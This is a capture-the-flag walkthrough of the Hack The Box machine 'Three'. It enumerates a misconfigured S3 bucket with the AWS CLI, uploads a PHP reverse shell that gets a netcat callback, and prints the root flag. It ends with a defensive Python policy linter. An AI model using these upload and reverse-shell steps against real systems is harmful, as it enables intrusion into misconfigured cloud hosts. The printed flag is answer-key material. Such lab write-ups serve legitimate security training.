
HTB Three Walkthrough [Tier 1]: Learning AWS S3 Enumeration and Bucket Exploitation

This walkthrough covers the retired Hack The Box Tier 1 machine Three. The objective is to learn web enumeration, virtual host fuzzing, AWS S3 bucket enumeration, and PHP reverse shell exploitation.

Security Researcher passionate about DFIR, Network Security, Web Security, and Vulnerability Assessment.

Initial Enumeration

We begin by scanning the target machine using Nmap to identify open ports and running services.

nmap -sV -sC 10.129.25.2

Output

Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 03:50 EDT
Nmap scan report for 10.129.25.2
Host is up (0.28s latency).
Not shown: 998 closed tcp ports (reset)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7
80/tcp open  http    Apache httpd 2.4.29

Analysis

Two ports are exposed:

  • 22/tcp running SSH

  • 80/tcp running Apache HTTP Server

Since HTTP is accessible, web enumeration becomes the primary attack surface.


Website Investigation

Opening the website reveals a simple landing page. Checking the Contact section exposes an email address containing the domain:

thetoppers.htb

Since the domain does not resolve automatically, add it manually to /etc/hosts.

sudo nano /etc/hosts

Add:

10.129.25.2 thetoppers.htb

This allows local hostname resolution.


Virtual Host Enumeration

Subdomain enumeration is the next logical step.

We use FFUF to fuzz virtual hosts through the Host header. The -fs 11952 option filters out responses of 11952 bytes, the size of the default landing page, so only hostnames that answer differently are shown.

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u "http://thetoppers.htb" \
-H "Host: FUZZ.thetoppers.htb" -fs 11952 -mc all

Output

s3                      [Status: 404, Size: 21]
gc._msdcs               [Status: 400, Size: 306]

Another method using Gobuster confirms the result.

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://thetoppers.htb --append-domain

Output

s3.thetoppers.htb Status: 404 [Size: 21]
gc._msdcs.thetoppers.htb Status: 400 [Size: 306]

The interesting subdomain discovered is:

s3.thetoppers.htb

Discovering Amazon S3

Visiting the subdomain shows behavior consistent with an Amazon S3 bucket.

This indicates the target may be exposing cloud storage functionality.

To interact with the service, install AWS CLI.

sudo apt install awscli

Configure AWS CLI:

aws configure

Enumerating the S3 Bucket

List available buckets using:

aws s3 ls --endpoint-url http://s3.thetoppers.htb

Output

2025-08-25 03:49:04 thetoppers.htb

A bucket named thetoppers.htb is exposed.

Now enumerate bucket contents.

aws s3 ls --endpoint-url http://s3.thetoppers.htb s3://thetoppers.htb

Output

PRE images/
2025-08-25 03:49:04          0 .htaccess
2025-08-25 03:49:04      11952 index.php

The bucket holds an index.php of 11952 bytes, the same size as the default landing page seen during vhost fuzzing, so the bucket contents are served directly as the web root and the server executes PHP.

This is highly significant: any file written to the bucket becomes reachable through the web server, and a PHP file placed there will be executed, which opens the possibility of remote code execution through file upload.


Gaining Remote Access

We can exploit the exposed S3 bucket by uploading a PHP reverse shell.

Download the PHP reverse shell from:

https://github.com/pentestmonkey/php-reverse-shell

Save the file as:

shell.php

Before uploading, modify the IP address and listening port inside the reverse shell script.


Uploading the Reverse Shell

Upload the payload to the S3 bucket.

aws --endpoint-url http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb/

Output

upload: ./shell.php to s3://thetoppers.htb/shell.php

Now start a Netcat listener.

nc -lvnp 8080

Once the uploaded PHP file is accessed through the browser, a reverse shell connection is established.

Listener Output

listening on [any] 8080 ...
connect to [10.10.14.122] from (UNKNOWN) [10.129.25.2] 33394
Linux three 4.15.0-189-generic x86_64

We now have remote shell access to the machine.


Capturing the Flag

Search for the flag file.

find / -name flag.txt 2>/dev/null

Output

/root/flag.txt

Display the flag contents.

cat /root/flag.txt

Root Flag:

a980d99281a28d638ac68b9bf9453c2b

Conclusion:

This machine demonstrates how dangerous exposed cloud storage can become when misconfigured.

Key concepts learned from this box:

  • Web enumeration

  • Virtual host fuzzing

  • AWS S3 bucket enumeration

  • AWS CLI usage

  • PHP reverse shell exploitation

  • Remote command execution

Three is an excellent beginner-friendly machine for understanding cloud-related attack surfaces in web applications.
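The root cause on Three is a bucket that anonymous callers can both list and write to. The Python below is an added example, not part of the original walkthrough: it lints an S3 bucket policy and reports every Allow statement that grants listing or write actions to everyone. Both policies are constructed for illustration (only the bucket name comes from the box); the weak one models the exposure seen above and the hardened one keeps anonymous access to GetObject on objects only.

```python
import json

# Actions that let an unauthenticated caller enumerate or change bucket contents.
SENSITIVE_ACTIONS = {"s3:listbucket", "s3:putobject", "s3:deleteobject", "s3:*", "*"}

def _as_list(value):
    """IAM policy fields may be a single string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]

def _is_anonymous(principal):
    """True when a Principal matches every caller, including unauthenticated ones."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False

def find_anonymous_grants(policy_json):
    """Return (action, resource) pairs that Allow statements grant to everyone."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        # A Condition narrows the grant; such statements need manual review, not an auto flag.
        if stmt.get("Condition"):
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action.lower() in SENSITIVE_ACTIONS:
                for resource in _as_list(stmt.get("Resource", [])):
                    findings.append((action, resource))
    return findings

# Constructed policy modelling the exposure seen on Three: anyone may list the
# bucket and write objects into it, which is what lets shell.php land in the web root.
WEAK_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Principal": "*",
    "Action": ["s3:GetObject", "s3:ListBucket", "s3:PutObject"],
    "Resource": ["arn:aws:s3:::thetoppers.htb", "arn:aws:s3:::thetoppers.htb/*"]}]})

# Hardened counterpart: anonymous read of objects only, no listing and no writes.
HARDENED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::thetoppers.htb/*"}]})

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, find_anonymous_grants(policy))
```

The same check applies to a policy pulled with aws s3api get-bucket-policy; an empty result is necessary but not sufficient, since bucket ACLs and account-level public access block settings also decide who can write.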


Tools Used

Tool                 Purpose
Nmap                 Port scanning and service enumeration
FFUF                 Virtual host fuzzing
Gobuster             Subdomain enumeration
AWS CLI              Interacting with S3 buckets
Netcat               Reverse shell listener
PHP Reverse Shell    Remote code execution payload